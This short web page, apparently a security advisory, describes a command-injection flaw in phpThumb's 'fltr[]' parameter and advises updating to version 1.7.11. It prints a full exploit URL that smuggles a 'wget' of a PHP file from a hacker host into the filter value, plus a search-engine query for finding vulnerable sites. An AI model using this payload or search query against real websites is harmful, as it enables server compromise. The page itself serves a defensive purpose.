Home > PHP > phpThumb “fltr[]” security vulnerabilities

Example:
http://www.my-helper.com/web_assets/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;wget%20http://www.hacker.com/hack.php;&phpThumbDebug=9

How hackers found your site:
http://www.google.com.ng/search?q=/components/assets/+phpThumb.php&start=940&sa=N&hl=en&sout=1&biw=1280&bih=677&site=imghp&tbm=isch&itbs=1&sa=X&ved=0CDMQrQMwBDisBw

Fix:
Update phpThumb to ver 1.7.11 (http://sourceforge.net/projects/phpthumb/)



Flag Counter